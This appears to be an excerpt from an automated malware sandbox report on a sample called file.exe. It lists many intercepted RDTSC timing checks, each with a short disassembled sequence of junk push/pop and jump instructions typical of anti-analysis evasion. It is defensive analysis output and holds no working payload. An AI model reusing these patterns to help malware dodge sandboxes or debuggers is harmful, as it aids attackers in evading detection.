Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3803D second address: C38050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38ED6 second address: C38F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 popad 0x0000000a jmp 00007FE420CEA017h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007FE420CEA006h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38F08 second address: C38F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A7F8 second address: C3A7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3E2FA second address: C3E301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D624 second address: C3D635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FE420CEA006h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D635 second address: C3D652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE4211E2ABEh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D652 second address: C3D678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE420CEA00Ah 0x00000010 push ebx 0x00000011 js 00007FE420CEA006h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D91C second address: C3D94D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE4211E2ABAh 0x00000011 jmp 00007FE4211E2AC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D94D second address: C3D951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D951 second address: C3D957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3DBCF second address: C3DBF0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE420CEA017h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3DBF0 second address: C3DBF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F48 second address: C40F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FE420CEA00Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F70 second address: C40F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FE4211E2AB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F80 second address: C40F99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA015h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4708B second address: C470A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470A3 second address: C470B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA006h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470B6 second address: C470BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C470BA second address: C470BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4737C second address: C47382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C475E5 second address: C475EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C475EC second address: C475FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4791E second address: C47928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47928 second address: C4792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4792E second address: C47932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47932 second address: C47938 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47EAC second address: C47EC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE420CEA018h 0x00000008 jmp 00007FE420CEA012h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51977 second address: C5197B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5197B second address: C5198D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FE420CEA006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5198D second address: C51991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50D1B second address: C50D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5121F second address: C51233 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jns 00007FE4211E2AB6h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51233 second address: C5123E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51380 second address: C51389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51389 second address: C5138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5166F second address: C51675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51675 second address: C516AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE420CEA006h 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007FE420CEA018h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58E6F second address: C58E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58E7A second address: C58E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58E80 second address: C58E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58E86 second address: C58EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA017h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58EA1 second address: C58EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4211E2AC7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58EC2 second address: C58EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58EC6 second address: C58ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C570A4 second address: C570AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C570AA second address: C570B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C570B4 second address: C570B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C570B8 second address: C570DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABFh 0x00000007 jp 00007FE4211E2AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FE4211E2AB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C570DC second address: C570E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57525 second address: C5752B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5752B second address: C5752F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5752F second address: C5754B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FE4211E2ABEh 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57A0B second address: C57A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA017h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57D12 second address: C57D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58CC0 second address: C58CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58CCA second address: C58CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FE4211E2AC9h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E6F7 second address: C5E6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61871 second address: C61895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE4211E2AC9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61895 second address: C6189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6189B second address: C618A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C612DF second address: C612E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61443 second address: C61447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D12F second address: C6D14E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jo 00007FE420CEA006h 0x00000012 pop esi 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CE82 second address: C6CE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C72973 second address: C72993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE420CEA014h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C724B9 second address: C724C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C724C2 second address: C724C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C724C8 second address: C724E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FE4211E2AC5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A1B4 second address: C7A1D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE420CEA018h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A1D5 second address: C7A20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4211E2AC5h 0x00000010 jmp 00007FE4211E2AC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A20B second address: C7A20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A04E second address: C7A067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABAh 0x00000007 jp 00007FE4211E2AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7A067 second address: C7A06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C80E82 second address: C80EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE4211E2AC9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C888B1 second address: C888C8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE420CEA00Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C87390 second address: C873A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jp 00007FE4211E2AB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873A8 second address: C873AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873AE second address: C873B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873B4 second address: C873B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873B8 second address: C873C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873C4 second address: C873C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C873C8 second address: C873CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C874DA second address: C874DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C874DE second address: C87507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE4211E2AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE4211E2AC9h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C864 second address: C8C868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C868 second address: C8C86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0AC8 second address: CB0AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FE420CEA006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0AD8 second address: CB0ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0ADE second address: CB0B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE420CEA010h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jl 00007FE420CEA006h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9DCA second address: CC9DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9DCE second address: CC9DE2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE420CEA008h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9DE2 second address: CC9DEE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4211E2AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9DEE second address: CC9E18 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE420CEA01Eh 0x00000008 jmp 00007FE420CEA018h 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FE420CEA006h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9E18 second address: CC9E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9E1C second address: CC9E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8B22 second address: CC8B3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE4211E2AC2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8B3D second address: CC8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE420CEA006h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E79 second address: CC8E8E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE4211E2AB6h 0x00000008 je 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E8E second address: CC8E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8FE3 second address: CC8FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE4211E2ABEh 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8FFA second address: CC900D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
